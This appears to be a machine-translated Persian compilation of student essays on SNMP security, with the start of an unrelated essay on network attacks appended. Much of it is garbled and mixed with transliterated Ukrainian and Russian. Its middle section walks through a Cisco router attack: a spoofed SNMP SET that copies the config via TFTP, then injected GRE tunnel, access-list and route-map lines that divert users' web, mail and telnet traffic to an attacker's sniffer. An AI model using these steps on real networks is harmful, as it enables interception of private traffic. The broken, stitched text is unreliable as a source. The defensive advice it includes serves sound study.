خوب، بیایید برویم و با پروتکل SNMP آشنا شویم. چه چیز دیگری می توان به موارد بالا اضافه کرد ... می توانید برای تغییر خطر مشکلات گناه با یک مرز امن یک دو تا ادای احترام به مدیران شبکه بکنید ... ابتدا باید به تنظیم فایروال توجه کنیم. در غیر این صورت، تنظیمات پشت نام گروه های پیش فرض را تغییر دهید. منطقی است که آدرس ماشین‌ها (مدیران) که آموزش نمایندگان از آن‌ها مجاز است، به شدت ثبت شود. در این مورد، من احترام می گذارم، می توانید مقاله را پایان دهید. دوست دارم باور کنم که او را به عنوان یک تسیکاوا دیدی.

امنیت اطلاعات – 2006

دوپوید

SNMP - پروتکل دستی

یا تهدیدی برای امنیت شرکت

- ماقبل تاریخSNMP

پروتکل SNMP (پروتکل مدیریت شبکه ساده) روش هایی را برای مدیریت منابع شبکه ارائه می دهد.

تاریخچه پروتکل SNMP (پروتکل مدیریت شبکه ساده) با جانشین آن SGMP (پروتکل نظارت دروازه ساده) آغاز می شود که در RFC 1028 در سال 1987 معرفی شد. SGMP به عنوان یک راه حل مبتنی بر زمان برای مدیریت مرز تکه تکه شد.

استاندارد SGMP از مدل طراحی اولیه SNMP پیروی می کند و پروتکل SGMP را از نظر جستجو و/یا تغییرات در روتر توصیف می کند. این استاندارد همچنین به نظر می رسد یک عملیات کوچک است، که هنوز هم اساس عملکرد SNMP امروزی است.

اولین نسخه از چارچوب SNMP، SNMPv1، در سال 1993 RFC 1067 (بعداً به RFC 1098 و 1157 بازبینی شد) تعیین شد.

مشخصات جدید SNMPv2 در سال 1996 منتشر شد و شامل موارد اضافی مانند: مکانیزم مسدود کردن، پاک کننده های 64 بیتی و بافر پیشرفته بود.

اضافه شده باقی مانده به پروتکل - SNMPv3 - در سال 1999 معرفی شد. اساساً همان SNMPv2، با تغییرات اضافی از منظر امنیتی، مانند: مدل امنیتی و مدل کنترل دسترسی.

- کنترل موثر بر لبه

SNMP می تواند برای مدیریت هر سیستم متصل به اینترنت استفاده شود

Vikoristannaya SNMP - حداقل

به دلیل MIB های جدید، قابلیت های مدیریتی را می توان به راحتی گسترش داد

مقاوم در برابر SNMP؛ با این حال، اگر شغلی دارید، مدیر می تواند به کار خود ادامه دهد (اگرچه ممکن است کمی بیشتر به زوسیلا نیاز داشته باشید)

در حال حاضر، پیکربندی دستگاه های انتقال داده شامل SNMP استاندارد است. این پروتکل به مهم ترین استاندارد برای مدیریت خط مشی تبدیل شده است.

-خیباSNMPآیا این یک تهدید است؟

با توجه به نسخه SNMP استاندارد و راه اندازی صحیح تجهیزات، این پروتکل می تواند در بسیاری از موارد هک، از هشیاری جزئی گرفته تا جاسوسی تجاری موثر مورد استفاده قرار گیرد.

مدیران سیستم اغلب اظهارات نادرستی در مورد SNMP می دهند. به دلیل عدم آگاهی از پروتکل و در نتیجه عدم آگاهی از مشکلات احتمالی، ایمنی مواد غذایی اغلب جدی گرفته نمی شود.

این واقعیت که پروتکل SNMP مبتنی بر UDP است حتی مفیدتر است. UDP به عنوان یک پروتکل بدون اتصال، در برابر حملات جعل IP آسیب پذیر است. اگر سازمان شما صاحب سیسکو است، شما آماده نظارت بر کارهایی هستید که آنها می توانند با SNMP انجام دهند.

سناریوی حمله 1.

در زیر پیکربندی دقیق روتر مورد حمله (روتر قربانی) آمده است:

پیکربندی فعلی: 1206 بایت

فعال کردن مخفی 5 $1$h2iz$DHYpcqURF0APD2aDuA. YX0

رابط Ethernet0/0

رابط Ethernet0/1

آدرس IP 192.168.0

شبکه 192.168.1.0

ip nat داخل فهرست منبع 102 رابط اترنت0/0 اضافه بار

بدون سرور ip http

دسترسی لیست 1 مجوز 192.168.

Access-list 102 اجازه IP any any

RO عمومی جامعه snmp-server

snmp-server Community RW 1 خصوصی

snmp-server traps tty را فعال می کند

ثبت همزمان

مقدار را به قانون دسترسی برای گروه RW تغییر دهید. این قانون برای محدود کردن دسترسی SNMP به خواندن/نوشتن در نظر گرفته شده است و این امکان را فقط برای کاربران شبکه محلی (192.168.1.0) می دهد.

دو مرحله اصلی حمله قابل مشاهده است:

دور زدن قوانین دسترسی SNMP روی روتر مورد حمله با ممانعت از دسترسی به فایل پیکربندی روتر. ایجاد یک تونل GRE بین روتر و روتر هکر برای هدایت ترافیک از راه دور از ماشین مشتری مورد حمله (Victim Client).

تئوری

با استفاده از دستور SNMP SET، می توانید روتر سیسکو را مجبور کنید تا فایل پیکربندی خود را با استفاده از TFTP لغو/اجرا کند.

پس از ارسال SNMP یک SET با آدرس IP تکه تکه شده (در محدوده توضیح داده شده در RFC10)، باید از روتری که مورد حمله قرار گرفته است بخواهیم فایل پیکربندی خود را برای ما ارسال کند. این چیزی را منتقل می کند که ما می دانیم "رشته جامعه خصوصی" و ACL توصیف شده در ردیف پیکربندی گروه RW است.

دور زدن قوانین دسترسی SNMP

در نهایت، از ایجاد یک درخواست SNMP تکه تکه شده. Vikoristovuchi اسکریپت پرل کوچک و Ethereal، ما مجموعه استاندارد SNMP را با "کپی پیکربندی" جایگزین خواهیم کرد، که ما آن را به عنوان یک بسته اصلی vikoristovat خواهیم کرد.

[ایمیل محافظت شده]# ./copy-router-config. pl

######################################################

# پیکربندی روتر سیسکو را کپی کنید - با استفاده از SNMP

# هک شده توسط muts - *****@***co. il

#######################################################

استفاده: ./cisco-copy-config. pl

مطمئن شوید که یک سرور TFTP تنظیم شده است، ترجیحا از /tmp اجرا شود!

پس از راه اندازی اسکریپت، بسته SNMP دانلود می شود. همانطور که مشخص شد، این به روتر ارسال می شود و فایل پیکربندی ارسال نمی شود.

مقدار را به آدرس IP مهاجم (80.179.76.227) بازنشانی کنید. اکنون با استفاده از ویرایشگر هگز می توانیم این آدرس IP و سایر فیلدهای هدر بسته را تغییر دهیم. در سیستم شانزده، تعداد آدرس های IP تکه تکه شده 192.168.1.5 شبیه C0 A8 است.

سپس یک بسته را با استفاده از file2cable (یا یک تولید کننده بسته دیگر) پیدا خواهیم کرد.

بسته قوانین دسترسی SNMP را دور می زند و ما فایل پیکربندی روتری را که از طریق TFTP مورد حمله قرار گرفته است بازیابی می کنیم.

تونل GRE

GRE (Generic Routing Encapsulation) یک پروتکل تونل زنی برای کپسوله کردن چندین نوع بسته سطح متوسط ​​در وسط یک بسته سطح متوسط ​​است. یکی از گزینه‌های استفاده از GRE، اتصال بخش‌های شبکه IPX از طریق یک کانال پیوند است که از لایه شبکه مدل OSI پشتیبانی می‌کند. در این مورد، شما باید یک تونل GRE از یک روتر به روتر دیگر ایجاد کنید تا بسته های IPX را از طریق کانالی که از پروتکل IP پشتیبانی می کند، به عقب و جلو منتقل کند.

با این حال، ما از GRE برای دستیابی به اهدافی فراتر از هدف اصلی آن استفاده خواهیم کرد. برنامه ما برای حمله است:

یک تونل GRE از مسیریاب مورد حمله به هکر ایجاد کنید. این بدان معناست که چه نوع ترافیکی از تونل عبور می کند. بسته‌های GRE که از روتر مورد حمله قرار می‌گیرد را باز کنید و آنها را برای تجزیه و تحلیل به رایانه مهاجم (sniffer) ارسال کنید.

حملات روتر

ما باید یک تونل GRE روی روتری که مورد حمله قرار می گیرد ایجاد کنیم. از آنجایی که ما به ترمینال (کنسول) دسترسی نداریم، می توانیم به سادگی فایل پیکربندی را ویرایش کرده و سپس آن را به روتر برگردانیم و جزئیات SNMP SET را بپرسیم. در اینجا مراحل بعدی در فایل پیکربندی روتر مورد حمله آمده است:

تونل رابط 0

آدرس IP 192.168.10

منبع تونل Ethernet0/0

مقصد تونل

آی پی خاکستری حالت تونل

بوی بد یعنی:

ما یک رابط tunnel0 ایجاد کردیم و آدرس IP شبکه را 192.168.10.x تعیین کردیم. برای تبادل داده در انتهای تونل، مقصران باید در یک بعد باشند. ما نشان دادیم که رابط Ethernet0/0 انتهای تونل است (در غیر این صورت، تونل می تواند راه اندازی شود؟) انتهای تونل آدرس IP رابط خارجی روتر هکر نیست. دستور باقی مانده اجباری نیست، زیرا در پشت صحنه خود تونل GRE هنوز ایجاد می شود (اگرچه ما هنوز آنها را برای وضوح بیشتر اضافه کردیم).

اکنون می‌توانیم قوانین دسترسی (لیست‌های دسترسی) را تنظیم کنیم تا نوع ترافیک عبوری از تونل و نقشه‌های مسیریابی (نقشه‌های مسیر) مورد نیاز برای تغییر مسیر ترافیک را مشخص کنیم.

برای این منظور، فایل پیکربندی روتر مورد حمله دارای چندین ردیف دیگر است:

لیست دسترسی 101 اجازه tcp هر معادله 443 را می دهد

لیست دسترسی 101 هر معادله 80 را مجاز می کند

لیست دسترسی 101 هر معادله 21 را مجاز می کند

لیست دسترسی 101 هر معادله 20 را مجاز می کند

لیست دسترسی 101 هر معادله 23 را مجاز می کند

لیست دسترسی 101 هر معادله 25 را مجاز می کند

لیست دسترسی 101 هر معادله 110 را مجاز می کند

ما اجازه انتقال داده ها را با استفاده از پروتکل های SSL، HTTP، FTP، telnet، SMTP و POP3 دادیم.

حال اگر ترافیک از قوانینی که در بالا توضیح داده شد پیروی کند، تغییر مسیرها به نقشه های مسیریابی ارسال می شود که توضیحات آن باید به فایل پیکربندی اضافه شود:

مسیریاب-نقشه تغییر مسیر ترافیک

مطابقت با آدرس IP 101

تنظیم ip next-hop 192.168.10.2

رابط Ethernet0/0

خط مشی ip route-map divert-traffic

ما یک قانون دسترسی ایجاد کردیم که به همه انواع ترافیک اجازه می دهد. ما یک نقشه مسیریابی انحرافی به اسنیفر ایجاد کردیم (این نقشه مسیریابی ترافیک تونل زنی را به اسنیفر هدایت می کند). ایجاد یک قانون دسترسی بر اساس درک انطباق است. به عنوان آدرس های بعدی، آدرس IP مهاجم (sniffer) را مشخص کردیم. ما نقشه مسیریابی را به رابط tunnel0 دانلود کردیم.

بسیار مهم است که ما یک نقشه مسیریابی برای تغییر مسیر داده ها ایجاد کنیم. روتر داده های تونل شده را در یک بسته GRE دریافت می کند و بدون رمزگشایی بسته نمی توانیم آن را مشاهده کنیم. با ارسال بسته های sniffer به مهاجم (sniffer)، روتر آنها را به عنوان بسته های IP اصلی بدون کپسوله سازی GRE ارسال می کند.

بیایید یک نقشه مسیریابی ایجاد کنیم و آن را با رابط Ethernet0/0 مرتبط کنیم:

مهاجم (config-if)# route-map divert-out

مهاجم (config-route-map)# مطابق با آدرس IP 101

مهاجم (config-route-map) # set ip next-hop 192.168.10.1

مهاجم (config-route-map)# خروج

مهاجم(پیکربندی)# رابط اترنت0/0

مهاجم (config-if)# خط مشی ip route-map divert-out

این پارامترهای اضافی به این معنی است:

هنگامی که مهاجم (sniffer) داده های تونل شده را خزیده و به عقب فرستاده است، نقشه مسیریابی انحرافی، ترافیک را به مسیریاب مورد حمله هدایت می کند. ما یک کارت مسیریابی را به رابط اترنت چسباندیم.

بیایید حمله را شروع کنیم

پس از تکمیل تمام تنظیمات، تنها کاری که باید انجام دهیم این است که تغییرات جدید را به فایل پیکربندی روتر مورد حمله وارد کنیم. نتیجه فعال شدن تونل GRE و هدایت مجدد تمام ترافیک از شبکه محلی کامپیوتر مورد حمله به هکر (sniffer) خواهد بود.

می‌توانید با ارسال یک دستور راه‌اندازی به روتر مهاجم، کارایی تونل را تأیید کنید:

تونل اشکال‌زدایی مهاجم#

-> 212.199.145.242، tos = 0x0

* 3 مارس 06:38: Tunnel0: GRE/IP برای طبقه بندی 212.199.145.242

->80.179.20.55 (len=108 type=0x800 ttl=253 tos=0x0)

* 3 مارس 06:38: Tunnel0: تعمیر مجاورت، 80.179.20.55

-> 212.199.145.242، tos = 0x0g همه

در نتیجه این اقدامات، Ethereal بسته های زیر را در رایانه مهاجم ضبط می کند:

https://pandia.ru/text/78/194/images/image006_20.jpg" width="624" height="468">

پس از چند سال می توانیم داده های اسکن را بازیابی کنیم:

حذف داده ها و جایگزینی نوع فعلی اطلاعات:

- SysName - می توانید آدرس، شماره تلفن مشترک را بیابید

- آدرس IP نماینده -

- DNS -

- زمان پاسخ -

-فروشنده-

- سیستمتوضیحات - می تواند به عنوان اطلاعات مفید اضافی در طول حملات استفاده شود

- انجمن-snmp-جامعه، برای اطلاعات بیشتر از آن خارج شدیم

- مکان - می توانید آدرس، شماره تلفن مشترک را پیدا کنید

- تماس - شما می توانید نام خود را پیدا کنید، لطفا با مدیر تماس بگیرید

- آخرین زمان بوت -

- رابط - هر چه بیشتر، بهتر است

- وضعیت کشف -

از این داده‌ها، آدرس‌های IP و برنامه Real-time Network Monitor حذف می‌شوند تا مشخص شود چه اطلاعات مرتبطی را می‌توان با استفاده از پرس‌وجوهای SNMP اضافی استخراج کرد.

همچنین می توان به سادگی با جایگزینی نام snmp-community از عمومی به خصوصی، دسترسی به دستگاه را به طور کامل رد کرد. تیم خودمان توانایی غلبه بر دستورات snmp را نشان می دهد.

نتیجه حمله:

پس از این آزمایش متوجه شدیم که:

توصیه نمی شود از ساده ترین روش محافظت - لیست های دسترسی استفاده کنید

شما به راحتی می توانید تعداد مشتریان ارائه دهنده را تعیین کنید

اطلاعات محرمانه مشتریان ارائه دهنده

پتانسیل اقتصادی ارائه دهنده

اطلاعات اصلی که می تواند در حملات مختلف استفاده شود

- به راحتی می توانید آمار را از ارائه دهنده و مشتریان شرکت خود جمع آوری کنید و سپس از همان روش استفاده کنید

- چگونه می توانید از حملات جلوگیری کنید؟ متودی زاخیستو

گاهی افعال گفتار آن چیزی نیست که باید باشد. اگر با SNMP (یا سایر پروتکل‌های مبتنی بر UDP) کار می‌کنید، ابتدا باید از نقاط ضعف و شکاف‌هایی که در صورت نادیده گرفتن آنها می‌تواند باعث به خطر افتادن شبکه شما شود، آگاه باشید.

روش برای زاخیست ها بسیار ساده است. بوی هنوز در میان مدیران خواهد بود:

تنظیمات استاندارد را محروم نکنید (به طور پیش فرض)

به درستی از طریق طرح پروتکل vikoristannya فکر کنید

نام های معنی دار snmp-community

لیست های دسترسی Vikoristovvati

آدرس‌های IP منفرد را در لیست‌های دسترسی به جای محدوده IP نشان دهید

- Visnovok

هدف از روش روباتیک نشان دادن این بود که حمله توصیف شده به اندازه نقض احتمالی پروتکل‌های مبتنی بر UDP مؤثر نیست. این بدان معنا نیست که داشتن Cisco/ZyXel ناامن است. پیکربندی مناسب باید شانس دور زدن حفاظت را به حداقل برساند. عفو متولیان مرزی دلیل اصلی سازش مالکیت مرزی است.

ZMIST
ورودی 3
1. از لحاظ نظری مشکلات روش های پیشرفته حملات بر پروتکل SNMP
1.1 نیاز به زنده کردن روش های حملات بر پروتکل SNMP 5
1.2 پروتکل SNMP: شرح، هدف 7
2. تجزیه و تحلیل حملات به پروتکل SNMP و روشهای ضد زمان
2.1 تکنیک های حمله به پروتکل SNMP و روش های پیشبرد 11
2.2 راه برای مقابله با حملات در پروتکل SNMP 15
VISNOVOK 20
LIST OF VIKORISTANIH JEREL 21

قطعه برای اطلاعات

شکل 3 - فرم صفحه نمایش ابزار SoftPerfectNetworkScanner Patch ها آشکارسازهای بسیاری از دستگاه های اندازه گیری به اصطلاح وصله هایی را که در هنگام شناسایی ریزش در سیستم ضروری هستند، جدا می کنند. بنابراین، اگر دستگاه های SNMP گرا را کشف کرده اید، باید با آشکارسازهای این دستگاه ها تماس بگیرید تا متوجه شوید که آیا وصله های لازم حذف شده اند یا خیر. بیایید الگوریتم فعال کردن سرویس SNMP در سیستم عامل ویندوز را شرح دهیم: منوی Start - Control Panel - Administration - Services (بخش شکل 4) را انتخاب کنید. سرویس SNMP را انتخاب کنید. اگر سرویس در حال اجرا است، روی دکمه "راه اندازی" کلیک کنید و سپس "نوع راه اندازی" - "فعال" را انتخاب کنید. Malyunok 4 - فعال کردن سرویس SNMP Warto لطفاً توجه داشته باشید که فعالیت‌هایی که محصولات احتمالی در حال ریختن هستند، مستعد حملات DoS یا سایر اقداماتی هستند که هنگام فعال کردن SNMP، پایداری کار را از بین می‌برند. فیلتر کردن در ورودی فیلتر در ورودی به تنظیمات پیکربندی شده تنظیم می‌شود. صفحات مرزی و روترها به طوری که آنها حذف می شوند فیلتر ورودی پورت های UDP 161 و 162. این به شما امکان می دهد از حملاتی که از شبکه خارجی بر روی دستگاه در شبکه محلی منشا می گیرند جلوگیری کنید. سایر پورت هایی که از خدمات مرتبط با SNMP پشتیبانی می کنند، از جمله پورت های TCP و UDP 161، 162، 199، 391، 750 و 1993 نیز می توانند از فیلتر ورودی بهره مند شوند. ، چه چیزی فراتر از محدودیت ها باشد. فیلتر کردن ترافیک خروجی در پورت های UDP 161 و 162 در مرز می تواند از تبدیل شدن سیستم شما به سکوی پرشی برای حمله جلوگیری کند. این سیستم نفوذ سخت افزاری را شناسایی کرده و از آن جلوگیری می کند، که نشانه هایی از نفوذ غیرمجاز (تهاجم یا حمله به حصار) به یک سیستم کامپیوتری یا حاشیه را نشان می دهد. بدون IDS، زیرساخت امنیتی غیرقابل تصور می شود. صفحه نمایش های فرامرزی اضافی که بر اساس قوانین امنیتی کار می کنند، IDS نظارت دارند و از فعالیت های مشکوک محافظت می کنند. آنها می توانند مزاحمینی را که به صفحه نمایش موقت نفوذ کرده اند شناسایی کنند و به مدیر اطلاع دهند که راه حل لازم برای حفظ امنیت را تحسین می کند. روش های تشخیص نفوذ امنیت کامل سیستم را تضمین نمی کند. در نتیجه استفاده از IDS، اهداف زیر حاصل می شود: تشخیص حمله یا نفوذ شخص ثالث. پیش بینی حملات آتی فعلی و شناسایی نقاط ضعیف سیستم برای شکست آنها. در بسیاری از موارد، مهاجم به مرحله آماده سازی می رود، به عنوان مثال، گیج را کاوش می کند (اسکن) می کند یا آن را به روش دیگری آزمایش می کند تا نشت های موجود در سیستم را شناسایی کند. اسناد فعلی تهدیدات موجود؛ استخراج اطلاعات ارزشمند در مورد نفوذ رخ داده به منظور به روز رسانی و اصلاح عواملی که منجر به نفوذ شده است. شناسایی گسترش مکانیسم حمله از نقطه نظر شبکه خارجی (حملات خارجی یا داخلی)، که اجازه می دهد تصمیمات صحیح در هنگام بازیابی گره های شبکه گرفته شود. در قسمت جلویی IDS وجود دارد: یک زیرسیستم امنیتی که اطلاعات مربوط به فرآیندهایی را که ممکن است مربوط به اقدامات امنیتی یا سیستم هایی باشد که محافظت می شوند جمع آوری می کند. یک زیر سیستم تجزیه و تحلیل که موارد مشکوک و حملات مرزی را شناسایی می کند. غضروف، که مراحل اولیه و نتایج تجزیه و تحلیل را حفظ می کند. IDS، تجزیه و تحلیل یافته ها توسط زیر سیستم تحلیل موقعیت. در پایان، مهم است که سادگی پروتکل محبوب SNMP ممکن است منجر به تکثیر شود. قطعات SNMP حتی بیشتر احتمال دارد که راکد شوند و استفاده از آنها با محصولات ریخته شده می تواند منجر به نتایج مخربی شود. بنابراین، برای پیاده سازی موثر پروتکل SNMP، باید راه های مختلفی را برای جلوگیری از حملات و ایجاد یک سیستم حفاظتی جامع معرفی کنید. فرآیند روباتیک ویژگی‌های پروتکل نام‌برده و مشکلات احتمالی خرابی آن را آشکار کرد. برای اثبات مشکل، داده های آماری ارائه شد که قابلیت اطمینان بالای اجرای حملات مرزی را تایید می کند. علاوه بر این، از نظر تئوری می توان اطلاعاتی در مورد ساختار پروتکل، مدار ورودی/خروجی ها و مراحل استخراج ورودی ها از ورودی ها ارائه کرد. تغییرپذیری ردیف قالب البته تهدیدهای بالقوه بسیار بیشتری وجود دارد، اما نگاهی اجمالی به آنها بررسی عمیق و جامع تری را نشان می دهد. بر اساس تجزیه و تحلیل، مشخص شد که پروتکل SNMP در معرض سرریزها است و در نهایت، پس از تدوین یک سیاست امنیتی و رعایت تمام اصول آن، در مورد این موضوع تصمیم گیری شد. به این ترتیب می توانید دستاوردهای هدف و بالاترین هدف را که در ورودی تعیین شده اند، یادداشت کنید. اعمال نظارتی و قانونی DZHERELAN قانون فدرال فدراسیون روسیه مورخ 27 ژوئن 2006 N 149-FZ درباره اطلاعات، فناوری اطلاعات و حفاظت از اطلاعات فهرست ادبیات تخصصی و علمی Blank-Edelman D. Perl for system management, M.: symbol-Plus, 2009. 47 8s. Borodakiy V.Yu. تمرین و چشم انداز ایجاد اطلاعات دزدیده شده و زباله های محاسباتی بر اساس MSS OGV / V.Yu. بوروداکی، آ.یو. دوبرودف، پ.ا. Nashchokin // مشکلات فعلی در توسعه سیستم های فناوری امنیت دولتی، ارتباطات ویژه و امنیت اطلاعات ویژه: هشتم کنفرانس علمی بین رشته ای همه روسی: مواد و شواهد (اورل، 13-14 20 13 روبل). - حدود 10 سالشه قسمت 4 / برای zag.red. V.V. میزروف. - Orel: آکادمی خدمات تعرفه فدرال روسیه، 2013. Grishina N.V. سازمان یک سیستم جامع امنیت اطلاعات. - M.: Helios ARV, 2009. - 256 p., Douglas R. Mauro Fundamentals of SNMP, 2nd edition / Douglas R. Mauro, Kevin J. Schmidt - M.: Symbol-Plus, 2012. -725s. M.V. اندازه گیری های کامپیوتری تمرین شما را بیدار می کند. For fakhivtsіv, St. Petersburg: Peter, 2003.-462 pp. Mulyukha V.A. روش های حفاظت از اطلاعات کامپیوتری Mizhmerezheve ekranuvannya: Navchalniy posibnik / Mulyukha V.A.، Novopashenny A.G.، Podgursky Yu.E. - سن پترزبورگ: Vidavnitstvo SPbSPU، 2010. - 91 p. Olifer V. G.، Olifer N. P. اندازه گیری های کامپیوتری. اصول، فناوری ها، پروتکل ها. - چهارم – سن پترزبورگ: پیتر، 2010. -902 ص. فن آوری های سوئیچینگ و مسیریابی در شبکه های کامپیوتری محلی: راهنمای اساسی / اسمیرنوا. St ta in; ویرایش A.V. پرولتارسکی - M.: نمای MDTU im. نه. باومن، 2013. - 389 ص. Flenov M. Linux ochima Hacker, St. Petersburg: BHV-St. Petersburg, 2005. - 544 pp. Khoriev P.V. روش های حفاظت از اطلاعات در سیستم های کامپیوتری - M.: انتشارات مرکز "آکادمی"، 2005. -205 ص Khoroshko V. A.، Chekatkov A. A. روش های حفاظت از اطلاعات، K.: جونیور، 2003. - 504 p. دستگاه های اینترنتی IDS/IPS - سیستم های شناسایی و جلوگیری از نفوذگران [منبع الکترونیکی] آدرس اینترنتی: http://netconfig.ru/server/ids-ips/.Analysis of Internet threads in 2014. حملات DDoS هک کردن وب سایت ها. [منبع الکترونیکی]. URL: http://onsec.ru/resources/Internet%20threats%20in%202014.%20Overview%20by%20Qrator-Wallarm.pdf Kolischak A. تغییرپذیری ردیف قالب [منبع الکترونیکی]. URL: https://securityvulns.ru/articles/fsbug.aspFirst Mile، شماره 04، 2013 [منبع الکترونیکی]. URL: http://www.lastmile.su/journal/article/3823 خانواده استانداردهای SNMP [منبع الکترونیکی]. نشانی اینترنتی: https://ua.wikibooks.org/wiki /Family_of_standards_SNMP_ادبیات بین‌المللی "CERT Advisory CA-2002-03: چندین آسیب‌پذیری در پیاده‌سازی Bagato از پروتکل مدیریت شبکه ساده (SNMP)"، 12 فوریه. 2002، (11 مارس 2002 فعلی)

فهرست VIKORISTANIH JEREL
اقدامات نظارتی
1. قانون فدرال فدراسیون روسیه مورخ 27 ژوئن 2006. N 149-FZ درباره اطلاعات، فناوری اطلاعات و حفاظت از اطلاعات
فهرست متون تخصصی و علمی
2. Blank-Edelman D. Perl برای مدیریت سیستم، M: symbol-Plus، 2009. - 478 p.
3. Borodakiy V.Yu. تمرین و چشم انداز ایجاد اطلاعات دزدیده شده و زباله های محاسباتی بر اساس MSS OGV / V.Yu. بوروداکی، آ.یو. دوبرودف، پ.ا. Nashchokin // مشکلات فعلی در توسعه سیستم های فناوری امنیت دولتی، ارتباطات ویژه و امنیت اطلاعات ویژه: هشتم کنفرانس علمی بین رشته ای همه روسی: مواد و شواهد (اورل، 13-14 20 13 روبل). - حدود 10 سالشه قسمت 4 / برای zag.red. V.V. میزروف. - اورل: آکادمی خدمات تعرفه فدرال روسیه، 2013.
4. Grishina N.V سازماندهی یک سیستم پیچیده امنیت اطلاعات. - M.: Gelios ARV، 2009. - 256 p.
5. Douglas R. Mauro Fundamentals of SNMP, 2nd edition / Douglas R. Mauro, Kevin J. Schmidt - M.: Symbol-Plus, 2012.-725p.
6. کولگین ام.وی. اندازه گیری های کامپیوتری تمرین شما را بیدار می کند. برای fakhivtsіv، سنت پترزبورگ: پیتر، 2003.-462 ص.
7. Mulyukha V.A. روش های حفاظت از اطلاعات کامپیوتری Mizhmerezheve ekranuvannya: Navchalniy posibnik / Mulyukha V.A.، Novopashenny A.G.، Podgursky Yu.E. - سن پترزبورگ: Vidavnitstvo SPbSPU، 2010. - 91 p.
8. Olifer V. G.، Olifer N. P. اقدامات کامپیوتری. اصول، فناوری ها، پروتکل ها. - چهارم – سن پترزبورگ: پیتر، 2010. -902 ص.
9. فن آوری های سوئیچینگ و مسیریابی در شبکه های کامپیوتری محلی: راهنمای اولیه / Smirnova. St ta in; ویرایش A.V. پرولتارسکی - M.: نمای MDTU im. نه. باومن، 2013. - 389 ص.
10. Flenov M. Linux ochima Hacker, St. Petersburg: BHV-St. Petersburg, 2005. - 544 p.
11. Khorev P.V. روش های حفاظت از اطلاعات در سیستم های کامپیوتری - م.: مرکز علمی "آکادمی"، 2005. -205 ص.
12. Khoroshko V. A., Chekatkov A. A. روشها و روشهای حفاظت از اطلاعات، K.: Junior, 2003. – 504 p.
اینترنت-dzherela
13. IDS/IPS - سیستم‌های شناسایی و جلوگیری از مزاحمان [منبع الکترونیکی] URL: http://netconfig.ru/server/ids-ips/.
14. تحلیل تهدیدات اینترنتی در سال 2014. حملات DDoS هک کردن وب سایت ها. [منبع الکترونیکی]. URL: http://onsec.ru/resources/Internet%20threats%20in%202014.%20Overview%20by%20Qrator-Wallarm.pdf
15. Kolishchak A. تغییرپذیری ردیف قالب [منبع الکترونیکی]. آدرس اینترنتی: https://securityvulns.ru/articles/fsbug.asp
16. پرشا مایل، شماره 04، 2013 [منبع الکترونیکی]. آدرس اینترنتی: http://www.lastmile.su/journal/article/3823
17. خانواده استانداردهای SNMP [منبع الکترونیکی]. آدرس اینترنتی: https://ua.wikibooks.org/wiki /SNMP_standards_family
ادبیات خارجی
18. "CERT Advisory CA-2002-03: آسیب پذیری های متعدد در بسیاری از پیاده سازی های پروتکل مدیریت ساده شبکه (SNMP)"، 12 فوریه. 2002، (11 مارس 2002 فعلی)

نوشته شده در http:// www. همه بهترین. ru/

نوشته شده در http:// www. همه بهترین. ru/

مروری بر تکنیک های حمله لبه در سطح لبه مدل OSI و اقدامات متقابل

ورود

حملات لبه ویروس تروجان

هر اطلاعاتی دارای سه قدرت اصلی است:

· محرمانه بودن

· استحکام.

· دسترسی.

پوست این مراجع را توضیح دهید.

Conflight INFORMASIA - TS VIDOMOSTI، YAKI در Volodіnni یافت می شود، Coristannni یک الیاف غیرمسکونی خطرناک از مقامات قانونی Osіb است، برای دوختن برای ї Bazhanni vidpovo، به یوگا، چشم انداز ذهن.

یکپارچگی اطلاعات (یکپارچگی داده ها) اصطلاحی در علم اطلاعات و تئوری مخابرات است که به این معنی است که داده ها در طول Viconn تغییر نکرده و هرگونه عملیات روی آنها، انتقال، ذخیره یا دادن.

در دسترس بودن اطلاعات - وضعیت اطلاعات (منابع یک سیستم اطلاعاتی خودکار)، که موضوع دارای حقوق دسترسی است، می تواند آنها را بدون وقفه اجرا کند. حقوق دسترسی: حق خواندن، تغییر، کپی، از دست دادن و تغییر اطلاعات، کپی، محدودیت منابع.

سه راه اصلی برای ایمن سازی اطلاعات به ترتیب اهمیت وجود دارد:

· روش های سازمانی برای امنیت اطلاعات. حفاظت سازمانی از اطلاعات و هسته سازمانی، به اصطلاح "هسته" سیستم مخفی برای حفاظت از اطلاعات محرمانه شرکت. با توجه به کامل بودن و دقیق بودن تصمیم شرکت انبارداری و پرسنل کارخانه وظایف سازمانی، لازم است از اثربخشی عملکرد سیستم حفاظت اطلاعات اطمینان حاصل شود. نقش و جایگاه امنیت سازمانی اطلاعات در سیستم مخفی ورودی هایی که مستقیماً با هدف حفاظت از اطلاعات محرمانه یک شرکت انجام می شود، برای اتخاذ مسائل امنیتی در تصمیم گیری های جاری و صحیح مدیریت با حفاظت از اهمیت زیادی نشان داده شده است. نیروها، قابلیت‌ها، روش‌ها و روش‌های موجود برای حفاظت از اطلاعات بر اساس دستگاه‌های روشی نظارتی مناسب.

· روش های فنی برای حفاظت از اطلاعات. این روش ها امکان در دسترس بودن دستگاه ها و روش های فنی برای پردازش اطلاعات، راه حل های فنی ویژه ای که امنیت و کنترل اطلاعات را تضمین می کند، فراهم می کند. و علاوه بر این، روش‌های امنیت اطلاعات، مانند مجموعه‌ای از الگوریتم‌ها و برنامه‌هایی که کنترل دسترسی و حذف دسترسی غیرمجاز به اطلاعات را تضمین می‌کنند.